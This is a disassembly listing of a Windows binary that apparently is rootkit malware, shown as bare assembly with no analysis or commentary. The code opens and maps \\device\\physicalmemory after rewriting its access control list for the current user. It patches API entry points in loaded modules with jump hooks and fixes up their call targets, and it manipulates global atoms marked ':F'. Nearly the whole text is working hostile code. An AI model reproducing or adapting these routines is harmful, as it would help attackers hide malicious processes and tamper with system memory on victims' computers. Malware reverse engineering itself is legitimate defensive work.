call sub_407978 ; GetModuleHandleA
mov edi, eax
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push edi
call sub_407990 ; GetProcAddress
mov ds:dword_41913C, eax
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push edi
call sub_407990 ; GetProcAddress
mov ds:dword_408FF0, eax
push offset aNtopensection ; "NtOpenSection"
push edi
call sub_407990 ; GetProcAddress
mov ds:dword_408FE0, eax
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push edi
call sub_407990 ; GetProcAddress
mov ds:dword_409004, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push edi
call sub_407990 ; GetProcAddress
mov ds:dword_419138, eax
pop edi
retn
sub_4019A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A00 proc near ; CODE XREF: sub_401EAF+134�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 64h
push esi
push edi
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_58]
push eax
call ds:dword_41913C
mov [ebp+var_18], 18h
and [ebp+var_14], 0
lea eax, [ebp+var_58]
mov [ebp+var_10], eax
mov [ebp+var_C], 40h
and [ebp+var_8], 0
and [ebp+var_4], 0
and [ebp+var_30], 0
and [ebp+var_2C], 0
mov [ebp+var_28], 1
mov [ebp+var_24], 1
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
mov [ebp+var_50], 2
mov [ebp+var_4C], 1
and [ebp+var_48], 0
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+var_1C]
push eax
call ds:dword_408FE0
lea eax, [ebp+var_64]
push eax
push 0
lea eax, [ebp+var_5C]
push eax
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_407D68 ; GetSecurityInfo
lea eax, [ebp+var_60]
push eax
push [ebp+var_5C]
lea eax, [ebp+var_50]
push eax
push 1
call sub_407D80 ; SetEntriesInAclA
push 0
push [ebp+var_60]
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_407D74 ; SetSecurityInfo
push [ebp+var_1C]
call sub_407984 ; CloseHandle
lea eax, [ebp+var_18]
push eax
push [ebp+var_50]
lea eax, [ebp+var_1C]
push eax
call ds:dword_408FE0
mov eax, [ebp+var_1C]
pop edi
pop esi
leave
retn
sub_401A00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AE9 proc near ; CODE XREF: sub_401EAF+1B0�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
and [ebp+var_8], 0
xor edx, edx
mov [ebp+var_10], edx
mov [ebp+var_14], eax
push 4
push 0
push 1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push 0
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_409004
mov eax, [ebp+var_8]
leave
retn
sub_401AE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B2E proc near ; CODE XREF: sub_401EAF+21B�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_408FF0
pop ebp
retn
sub_401B2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B3E proc near ; CODE XREF: sub_401E23+7F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
xor edi, edi
loc_401B4F: ; CODE XREF: sub_401B3E+24F�j
movzx eax, byte ptr [esi+edi]
cmp eax, 0FFh
jnz short loc_401B8E
movzx eax, byte ptr [edi+esi+1]
cmp eax, 0FFh
jnz short loc_401B8E
movzx eax, byte ptr [edi+esi+2]
cmp eax, 0FFh
jnz short loc_401B8E
movzx eax, byte ptr [edi+esi+3]
cmp eax, 0FFh
jnz short loc_401B8E
movzx eax, byte ptr [edi+esi+4]
cmp eax, 0FFh
jz loc_401D93
loc_401B8E: ; CODE XREF: sub_401B3E+1A�j
; sub_401B3E+26�j ...
mov eax, [ebp+arg_8]
lea eax, [ebx+eax+5]
mov dl, [esi+edi]
mov [eax+edi], dl
mov [ebp+var_1], 0
loc_401B9F: ; CODE XREF: sub_401B3E+126�j
movzx eax, [ebp+var_1]
imul eax, 0Ch
movzx eax, byte_41AF74[eax]
movzx edx, byte ptr [esi+edi]
cmp edx, eax
jnz loc_401C4F
mov edx, edi
dec edx
movzx edx, byte ptr [esi+edx]
cmp edx, eax
jnz loc_401C4F
mov edx, edi
sub edx, 2
movzx edx, byte ptr [esi+edx]
cmp edx, eax
jnz short loc_401C4F
mov edx, edi
sub edx, 3
movzx edx, byte ptr [esi+edx]
cmp edx, eax
jnz short loc_401C4F
mov eax, edi
sub eax, 4
movzx eax, byte ptr [esi+eax]
cmp eax, 0E8h
jnz short loc_401C4F
movzx eax, [ebp+var_1]
imul eax, 0Ch
push off_41AF7C[eax]
call sub_407978 ; GetModuleHandleA
movzx edx, [ebp+var_1]
imul edx, 0Ch
push off_41AF78[edx]
push eax
call sub_407990 ; GetProcAddress
mov [ebp+var_8], eax
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_8]
lea edx, [ebx+edx+5]
add edx, edi
sub edx, 4
sub eax, edx
add eax, [ebp+var_8]
sub eax, 4
mov [ebp+var_C], eax
mov eax, [ebp+arg_8]
lea eax, [ebx+eax+5]
add eax, edi
sub eax, 4
mov edx, [ebp+var_C]
mov ds:1[eax], edx
jmp short loc_401C69
; ---------------------------------------------------------------------------
loc_401C4F: ; CODE XREF: sub_401B3E+76�j
; sub_401B3E+85�j ...
movzx eax, [ebp+var_1]
imul eax, 0Ch
cmp off_41AF78[eax], 0
jz short loc_401C69
add [ebp+var_1], 1
jmp loc_401B9F
; ---------------------------------------------------------------------------
loc_401C69: ; CODE XREF: sub_401B3E+10F�j
; sub_401B3E+120�j
cmp byte ptr [esi+edi], 4
jnz short loc_401CC3
mov eax, edi
dec eax
cmp byte ptr [esi+eax], 4
jnz short loc_401CC3
mov eax, edi
sub eax, 2
cmp byte ptr [esi+eax], 4
jnz short loc_401CC3
mov eax, edi
sub eax, 3
cmp byte ptr [esi+eax], 4
jnz short loc_401CC3
mov eax, edi
sub eax, 4
movzx eax, byte ptr [esi+eax]
cmp al, 68h
jz short loc_401CAD
cmp eax, 0BEh
jz short loc_401CAD
mov eax, edi
sub eax, 5
cmp byte ptr [esi+eax], 24h
jnz short loc_401CC3
loc_401CAD: ; CODE XREF: sub_401B3E+15B�j
; sub_401B3E+162�j
mov eax, ebx
add eax, [ebp+arg_8]
lea edx, [eax+edi+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
loc_401CC3: ; CODE XREF: sub_401B3E+12F�j
; sub_401B3E+138�j ...
cmp byte ptr [esi+edi], 2
jnz short loc_401D2E
mov eax, edi
dec eax
cmp byte ptr [esi+eax], 2
jnz short loc_401D2E
mov eax, edi
sub eax, 2
cmp byte ptr [esi+eax], 2
jnz short loc_401D2E
mov eax, edi
sub eax, 3
cmp byte ptr [esi+eax], 2
jnz short loc_401D2E
mov eax, edi
sub eax, 4
movzx eax, byte ptr [esi+eax]
cmp eax, 0E8h
jz short loc_401CFF
cmp eax, 0E9h
jnz short loc_401D2E
loc_401CFF: ; CODE XREF: sub_401B3E+1B8�j
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_8]
lea edx, [ebx+edx+5]
add edx, edi
sub edx, 4
sub eax, edx
add eax, ebx
sub eax, 4
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
lea eax, [ebx+eax+5]
add eax, edi
sub eax, 4
mov edx, [ebp+var_8]
mov ds:1[eax], edx
loc_401D2E: ; CODE XREF: sub_401B3E+189�j
; sub_401B3E+192�j ...
cmp byte ptr [esi+edi], 1
jnz short loc_401D86
mov eax, edi
dec eax
cmp byte ptr [esi+eax], 1
jnz short loc_401D86
mov eax, edi
sub eax, 2
cmp byte ptr [esi+eax], 1
jnz short loc_401D86
mov eax, edi
sub eax, 3
cmp byte ptr [esi+eax], 1
jnz short loc_401D86
mov eax, edi
sub eax, 4
movzx eax, byte ptr [esi+eax]
cmp al, 3Dh
jz short loc_401D6E
cmp eax, 0FEh
jz short loc_401D6E
cmp eax, 0FFh
jnz short loc_401D86
loc_401D6E: ; CODE XREF: sub_401B3E+220�j
; sub_401B3E+227�j
call sub_40793C ; GetCurrentProcessId
mov edx, [ebp+arg_8]
lea edx, [ebx+edx+5]
add edx, edi
sub edx, 4
mov ds:1[edx], eax
loc_401D86: ; CODE XREF: sub_401B3E+1F4�j
; sub_401B3E+1FD�j ...
inc edi
cmp edi, 400h
jb loc_401B4F
loc_401D93: ; CODE XREF: sub_401B3E+4A�j
pop edi
pop esi
pop ebx
leave
retn
sub_401B3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D98 proc near ; CODE XREF: sub_401EAF+53B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
jmp short loc_401DC2
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D98+34�j
xor edi, edi
jmp short loc_401DB1
; ---------------------------------------------------------------------------
loc_401DAA: ; CODE XREF: sub_401D98+1F�j
cmp byte ptr [esi+edi], 0
jnz short loc_401DB9
inc edi
loc_401DB1: ; CODE XREF: sub_401D98+10�j
cmp edi, 3E8h
jbe short loc_401DAA
loc_401DB9: ; CODE XREF: sub_401D98+16�j
cmp edi, 3E8h
jnb short loc_401DD3
inc esi
loc_401DC2: ; CODE XREF: sub_401D98+C�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp esi, eax
jbe short loc_401DA6
jmp loc_401EAA
; ---------------------------------------------------------------------------
loc_401DD3: ; CODE XREF: sub_401D98+27�j
add esi, 0Ah
movzx edx, [ebp+arg_8]
shl edx, 2
mov edi, ds:dword_408220[edx]
xor ebx, ebx
loc_401DE6: ; CODE XREF: sub_401E23+30�j
mov eax, edi
add eax, ebx
push eax
call sub_4015EC
pop ecx
movzx eax, byte ptr [edi+ebx]
cmp eax, 0E8h
jz short sub_401E23
cmp eax, 0E9h
jz short sub_401E23
and [ebp+var_4], 0
jmp short loc_401E17
; ---------------------------------------------------------------------------
loc_401E09: ; CODE XREF: sub_401D98+87�j
mov eax, ebx
add eax, [ebp+var_4]
mov dl, [edi+eax]
mov [esi+eax], dl
inc [ebp+var_4]
loc_401E17: ; CODE XREF: sub_401D98+6F�j
mov eax, ds:dword_408004
cmp [ebp+var_4], eax
jb short loc_401E09
jmp short loc_401E4A
sub_401D98 endp
; =============== S U B R O U T I N E =======================================
sub_401E23 proc near ; CODE XREF: sub_401D98+62�j
; sub_401D98+69�j
; DATA XREF: ...
mov al, [edi+ebx]
mov [esi+ebx], al
lea eax, [edi+ebx+1]
mov eax, [eax]
mov [ebp-8], eax
mov edx, esi
add edx, ebx
sub eax, edx
mov edx, edi
add edx, ebx
add eax, edx
mov [ebp-0Ch], eax
lea eax, [esi+ebx+1]
mov edx, [ebp-0Ch]
mov [eax], edx
loc_401E4A: ; CODE XREF: sub_401D98+89�j
add ebx, ds:dword_408004
cmp ebx, 5
jb short loc_401DE6
or eax, 0FFFFFFFFh
mov edx, esi
add edx, ebx
sub eax, edx
mov edx, edi
add edx, ebx
add eax, edx
sub eax, 4
mov [ebp-8], eax
mov byte ptr [ebx+esi], 0E9h
lea eax, [esi+ebx+1]
mov edx, [ebp-8]
mov [eax], edx
or eax, 0FFFFFFFFh
sub eax, edi
lea edx, [esi+ebx+5]
add eax, edx
sub eax, 4
mov [ebp-8], eax
mov byte ptr [edi], 0E9h
mov ds:1[edi], eax
push ebx
push esi
movzx edx, byte ptr [ebp+10h]
shl edx, 4
push off_41ADB8[edx]
call sub_401B3E
add esp, 0Ch
loc_401EAA: ; CODE XREF: sub_401D98+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_401E23 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EAF proc near ; CODE XREF: sub_406344+2FC�p
var_255C = dword ptr -255Ch
var_2180 = dword ptr -2180h
var_217C = byte ptr -217Ch
var_2174 = dword ptr -2174h
var_2170 = dword ptr -2170h
var_216C = dword ptr -216Ch
var_2168 = dword ptr -2168h
var_2164 = dword ptr -2164h
var_2160 = dword ptr -2160h
var_215C = dword ptr -215Ch
var_2158 = dword ptr -2158h
var_2054 = dword ptr -2054h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2048 = dword ptr -2048h
var_2044 = dword ptr -2044h
var_203C = dword ptr -203Ch
var_202C = dword ptr -202Ch
var_2028 = dword ptr -2028h
var_2024 = dword ptr -2024h
var_201D = byte ptr -201Dh
var_201C = dword ptr -201Ch
var_2018 = dword ptr -2018h
var_1014 = dword ptr -1014h
var_100D = byte ptr -100Dh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
mov eax, 255Ch
call sub_4078CC
push ebx
push esi
push edi
call sub_4019A1
mov [ebp+var_201D], 0
call sub_4079C0 ; GetVersion
cmp eax, 80000000h
jnb short loc_401EDE
mov [ebp+var_201D], 1
loc_401EDE: ; CODE XREF: sub_401EAF+26�j
mov [ebp+var_100D], 0
loc_401EE5: ; CODE XREF: sub_401EAF+EB�j
cmp [ebp+var_201D], 0
jnz short loc_401F02
movzx edx, [ebp+var_100D]
shl edx, 4
cmp byte_41ADBC[edx], 1
jz short loc_401F1F
loc_401F02: ; CODE XREF: sub_401EAF+3D�j
cmp [ebp+var_201D], 0
jz short loc_401F21
movzx edx, [ebp+var_100D]
shl edx, 4
cmp byte_41ADBC[edx], 2
jnz short loc_401F21
loc_401F1F: ; CODE XREF: sub_401EAF+51�j
jmp short loc_401F81
; ---------------------------------------------------------------------------
loc_401F21: ; CODE XREF: sub_401EAF+5A�j
; sub_401EAF+6E�j
movzx edx, [ebp+var_100D]
mov [ebp+var_2158], edx
mov ecx, edx
shl ecx, 4
push off_41ADB4[ecx]
call sub_407A50 ; LoadLibraryA
mov edx, [ebp+var_2158]
mov ds:dword_408B40[edx*4], eax
movzx edx, [ebp+var_100D]
mov ecx, edx
shl ecx, 4
push off_41ADB0[ecx]
shl edx, 2
mov [ebp+var_215C], edx
push ds:dword_408B40[edx]
call sub_407990 ; GetProcAddress
mov edx, [ebp+var_215C]
mov ds:dword_408220[edx], eax
loc_401F81: ; CODE XREF: sub_401EAF:loc_401F1F�j
add [ebp+var_100D], 1
movzx edx, [ebp+var_100D]
shl edx, 4
cmp off_41ADB0[edx], 0
jnz loc_401EE5
mov [ebp+var_100D], 0
loc_401FA7: ; CODE XREF: sub_401EAF+5A1�j
movzx edx, [ebp+var_100D]
shl edx, 2
cmp ds:dword_408220[edx], 0
jz loc_402437
movzx edx, [ebp+var_100D]
shl edx, 2
mov edx, ds:dword_408B40[edx]
mov [ebp+var_202C], edx
cmp [ebp+var_201D], 0
jz loc_402168
call sub_401A00
mov [ebp+var_2028], eax
mov edx, [ebp+var_202C]
mov ebx, edx
shr ebx, 16h
shl ebx, 16h
mov eax, ebx
add eax, 400000h
mov [ebp+var_100C], eax
xor edi, edi
jmp short loc_40202E
; ---------------------------------------------------------------------------
loc_40200D: ; CODE XREF: sub_401EAF+185�j
push 1000h
push ebx
call sub_407A38 ; IsBadReadPtr
mov esi, eax
xor esi, 1
shl esi, 2
mov [ebp+edi*4+var_1008], esi
inc edi
add ebx, 1000h
loc_40202E: ; CODE XREF: sub_401EAF+15C�j
cmp ebx, [ebp+var_100C]
jbe short loc_40200D
lea eax, [ebp+var_217C]
push eax
call sub_407A14 ; GlobalMemoryStatus
and [ebp+var_1014], 0
jmp loc_4020DA
; ---------------------------------------------------------------------------
loc_40204E: ; CODE XREF: sub_401EAF+23C�j
push 0FFFFh
push [ebp+var_1014]
push [ebp+var_2028]
call sub_401AE9
add esp, 0Ch
mov [ebp+var_4], eax
or eax, eax
jz short loc_4020D0
and [ebp+var_2180], 0
loc_402075: ; CODE XREF: sub_401EAF+583�j
mov ebx, [ebp+var_2180]
jmp short loc_4020BF
; ---------------------------------------------------------------------------
loc_40207D: ; CODE XREF: sub_401EAF+216�j
xor edi, edi
loc_40207F: ; CODE XREF: sub_401EAF+1F1�j
mov edx, ebx
shr edx, 2
shl edx, 2
add edx, [ebp+var_4]
mov esi, [edx+edi*4]
and esi, 4
cmp esi, [ebp+edi*4+var_1008]
jnz short loc_4020A2
inc edi
cmp edi, 400h
jb short loc_40207F
loc_4020A2: ; CODE XREF: sub_401EAF+1E8�j
cmp edi, 3FFh
jb short loc_4020B9
mov eax, ebx
add eax, 1000h
mov [ebp+var_2180], eax
jmp short loc_402101
; ---------------------------------------------------------------------------
loc_4020B9: ; CODE XREF: sub_401EAF+1F9�j
add ebx, 1000h
loc_4020BF: ; CODE XREF: sub_401EAF+1CC�j
cmp ebx, 0F000h
jbe short loc_40207D
push [ebp+var_4]
call sub_401B2E
pop ecx
loc_4020D0: ; CODE XREF: sub_401EAF+1BD�j
add [ebp+var_1014], 10000h
loc_4020DA: ; CODE XREF: sub_401EAF+19A�j
mov eax, [ebp+var_2174]
sub eax, 0FFFFh
cmp [ebp+var_1014], eax
jbe loc_40204E
push [ebp+var_2028]
call sub_407984 ; CloseHandle
jmp loc_402437
; ---------------------------------------------------------------------------
loc_402101: ; CODE XREF: sub_401EAF+208�j
movzx edx, [ebp+var_100D]
shl edx, 2
mov edx, ds:dword_408220[edx]
mov [ebp+var_100C], edx
and [ebp+var_100C], 0
loc_40211F: ; CODE XREF: sub_401EAF+2B7�j
mov edx, [ebp+var_100C]
shl edx, 2
mov ecx, ebx
shr ecx, 2
shl ecx, 2
add ecx, [ebp+var_4]
mov ecx, [ecx+edx]
mov [ebp+edx+var_2018], ecx
mov edx, [ebp+var_100C]
shl edx, 2
mov ecx, ebx
shr ecx, 2
shl ecx, 2
add ecx, [ebp+var_4]
add edx, ecx
or byte ptr [edx], 2
inc [ebp+var_100C]
cmp [ebp+var_100C], 400h
jb short loc_40211F
loc_402168: ; CODE XREF: sub_401EAF+12E�j
cmp [ebp+var_201D], 0
jnz short loc_4021CC
push offset aKernel32_dll ; "kernel32.dll"
call sub_407978 ; GetModuleHandleA
mov [ebp+var_2160], eax
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+var_2164], edx
add edx, 78h
add eax, [edx]
mov [ebp+var_2168], eax
mov eax, [ebp+var_2160]
mov edx, [ebp+var_2168]
add edx, 1Ch
add eax, [edx]
mov [ebp+var_216C], eax
mov eax, [ebp+var_2160]
mov edx, [ebp+var_216C]
add eax, [edx]
mov [ebp+var_2170], eax
mov [ebp+var_2054], eax
loc_4021CC: ; CODE XREF: sub_401EAF+2C0�j
push 1Ch
lea eax, [ebp+var_2048]
push eax
call sub_407AB0 ; RtlZeroMemory
mov eax, [ebp+var_202C]
mov [ebp+var_2024], eax
loc_4021E6: ; CODE XREF: sub_401EAF+372�j
; sub_401EAF+39A�j
push 1Ch
lea eax, [ebp+var_2048]
push eax
push [ebp+var_2024]
call sub_407B10 ; VirtualQuery
mov eax, [ebp+var_202C]
cmp [ebp+var_2044], eax
jnz short loc_40224B
mov eax, [ebp+var_203C]
mov [ebp+var_204C], eax
add [ebp+var_2024], eax
cmp [ebp+var_201D], 0
jnz short loc_4021E6
push 20060000h
push 0
mov edx, [ebp+var_204C]
shr edx, 0Ch
push edx
mov edx, [ebp+var_2048]
shr edx, 0Ch
push edx
push 1000Dh
call [ebp+var_2054]
jmp short loc_4021E6
; ---------------------------------------------------------------------------
loc_40224B: ; CODE XREF: sub_401EAF+357�j
movzx edx, [ebp+var_100D]
shl edx, 2
mov ecx, [ebp+var_2024]
sub ecx, [ebp+var_202C]
mov ds:dword_408620[edx], ecx
movzx edx, [ebp+var_100D]
shl edx, 2
mov edx, ds:dword_408220[edx]
mov [ebp+var_100C], edx
push 1000h
push edx
call sub_407A44 ; IsBadWritePtr
mov [ebp+var_2050], eax
or eax, eax
jnz loc_4023F2
cmp [ebp+arg_0], 0
jz loc_4023D6
mov eax, [ebp+var_100C]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_4022C1
cmp [ebp+arg_0], 1
jz loc_4023F2
jmp loc_4023D6
; ---------------------------------------------------------------------------
loc_4022C1: ; CODE XREF: sub_401EAF+401�j
mov eax, [ebp+var_100C]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_201C], eax
mov byte ptr [ebp+var_2160+3], 0
loc_4022E2: ; CODE XREF: sub_401EAF+4A9�j
sub [ebp+var_201C], 5
mov esi, [ebp+var_201C]
loc_4022EF: ; CODE XREF: sub_401EAF+471�j
mov eax, esi
dec eax
cmp byte ptr [eax], 0
jnz short loc_40231F
mov eax, esi
sub eax, 2
cmp byte ptr [eax], 0
jnz short loc_40231F
mov eax, esi
sub eax, 3
cmp byte ptr [eax], 0
jnz short loc_40231F
mov eax, esi
sub eax, 4
cmp byte ptr [eax], 0
jnz short loc_40231F
mov eax, esi
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_402322
loc_40231F: ; CODE XREF: sub_401EAF+446�j
; sub_401EAF+450�j ...
dec esi
jmp short loc_4022EF
; ---------------------------------------------------------------------------
loc_402322: ; CODE XREF: sub_401EAF+46E�j
movzx edx, byte ptr [ebp+var_2160+3]
shl edx, 2
mov [ebp+edx+var_255C], esi
add byte ptr [ebp+var_2160+3], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_40235A
mov eax, ds:1[esi]
sub eax, 0FFFFFFFFh
lea eax, [eax+esi+4]
mov [ebp+var_201C], eax
jmp short loc_4022E2
; ---------------------------------------------------------------------------
loc_40235A: ; CODE XREF: sub_401EAF+493�j
mov edi, esi
jmp short loc_40236D
; ---------------------------------------------------------------------------
loc_40235E: ; CODE XREF: sub_401EAF+4C4�j
mov eax, [ebp+var_100C]
add eax, edi
sub eax, esi
mov dl, [edi]
mov [eax], dl
inc edi
loc_40236D: ; CODE XREF: sub_401EAF+4AD�j
cmp edi, [ebp+var_201C]
jb short loc_40235E
loc_402375: ; CODE XREF: sub_401EAF+51F�j
sub byte ptr [ebp+var_2160+3], 1
movzx edx, byte ptr [ebp+var_2160+3]
shl edx, 2
mov edi, [ebp+edx+var_255C]
loc_40238D: ; CODE XREF: sub_401EAF+514�j
mov byte ptr [edi], 0
cmp byte ptr ds:1[edi], 0
jnz short loc_4023C2
cmp byte ptr ds:2[edi], 0
jnz short loc_4023C2
cmp byte ptr ds:3[edi], 0 ; DATA XREF: sub_41E239+2F�o
jnz short loc_4023C2
cmp byte ptr ds:4[edi], 0
jnz short loc_4023C2
cmp byte ptr ds:5[edi], 0
jz short loc_4023C5
loc_4023C2: ; CODE XREF: sub_401EAF+4E9�j
; sub_401EAF+4F3�j ...
inc edi
jmp short loc_40238D
; ---------------------------------------------------------------------------
loc_4023C5: ; CODE XREF: sub_401EAF+511�j
movzx eax, byte ptr [ebp+var_2160+3]
or eax, eax
jg short loc_402375
cmp [ebp+arg_0], 1
jz short loc_4023F2
loc_4023D6: ; CODE XREF: sub_401EAF+3ED�j
; sub_401EAF+40D�j
movzx eax, [ebp+var_100D]
push eax
push [ebp+var_2024]
push [ebp+var_202C]
call sub_401D98
add esp, 0Ch
loc_4023F2: ; CODE XREF: sub_401EAF+3E3�j
; sub_401EAF+407�j ...
cmp [ebp+var_201D], 0
jz short loc_402437
and [ebp+var_100C], 0
loc_402402: ; CODE XREF: sub_401EAF+581�j
mov edx, [ebp+var_100C]
shl edx, 2
mov ecx, ebx
shr ecx, 2
shl ecx, 2
add ecx, [ebp+var_4]
mov eax, [ebp+edx+var_2018]
mov [ecx+edx], eax
inc [ebp+var_100C]
cmp [ebp+var_100C], 400h
jb short loc_402402
jmp loc_402075
; ---------------------------------------------------------------------------
loc_402437: ; CODE XREF: sub_401EAF+10A�j
; sub_401EAF+24D�j ...
add [ebp+var_100D], 1
movzx edx, [ebp+var_100D]
shl edx, 4
cmp off_41ADB0[edx], 0
jnz loc_401FA7
pop edi
pop esi
pop ebx
leave
retn
sub_401EAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40245B proc near ; CODE XREF: sub_4024E0+13�p
; sub_40251A+14�p
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov ecx, edi
or eax, 0FFFFFFFFh
loc_40246E: ; CODE XREF: sub_40245B+18�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40246E
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_402499
; ---------------------------------------------------------------------------
loc_402485: ; CODE XREF: sub_40245B+44�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_402495
inc [ebp+var_2]
jmp short loc_4024A1
; ---------------------------------------------------------------------------
loc_402495: ; CODE XREF: sub_40245B+32�j
dec [ebp+var_2]
loc_402499: ; CODE XREF: sub_40245B+28�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_402485
loc_4024A1: ; CODE XREF: sub_40245B+38�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_4024DB
mov [ebp+var_4], 0
jmp short loc_4024C9
; ---------------------------------------------------------------------------
loc_4024B3: ; CODE XREF: sub_40245B+7E�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [esi+eax], dl
inc [ebp+var_4]
loc_4024C9: ; CODE XREF: sub_40245B+56�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_4024B3
loc_4024DB: ; CODE XREF: sub_40245B+4E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40245B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024E0 proc near ; CODE XREF: sub_402784+3A�p
; sub_40284A+19D�p ...
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call sub_40245B
push offset aF ; ":F"
lea eax, [ebp+var_104]
push eax
call sub_407E64
add esp, 10h
lea eax, [ebp+var_104]
push eax
call sub_4079F0 ; GlobalAddAtomA
leave
retn
sub_4024E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40251A proc near ; CODE XREF: sub_405AAC+146�p
; sub_405AAC+1A9�p ...
var_106 = word ptr -106h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
push edi
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call sub_40245B
push offset aF ; ":F"
lea eax, [ebp+var_104]
push eax
call sub_407E64
add esp, 10h
loc_402547: ; CODE XREF: sub_40251A+59�j
lea eax, [ebp+var_104]
push eax
call sub_407A08 ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_106], di
cmp [ebp+var_106], 0
jz short loc_402575
movzx eax, [ebp+var_106]
push eax
call sub_4079FC ; GlobalDeleteAtom
jmp short loc_402547
; ---------------------------------------------------------------------------
loc_402575: ; CODE XREF: sub_40251A+4A�j
pop edi
leave
retn
sub_40251A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402578 proc near ; CODE XREF: sub_402613+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_407DB0
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_40259B: ; CODE XREF: sub_402578+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40259B
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_4025C3
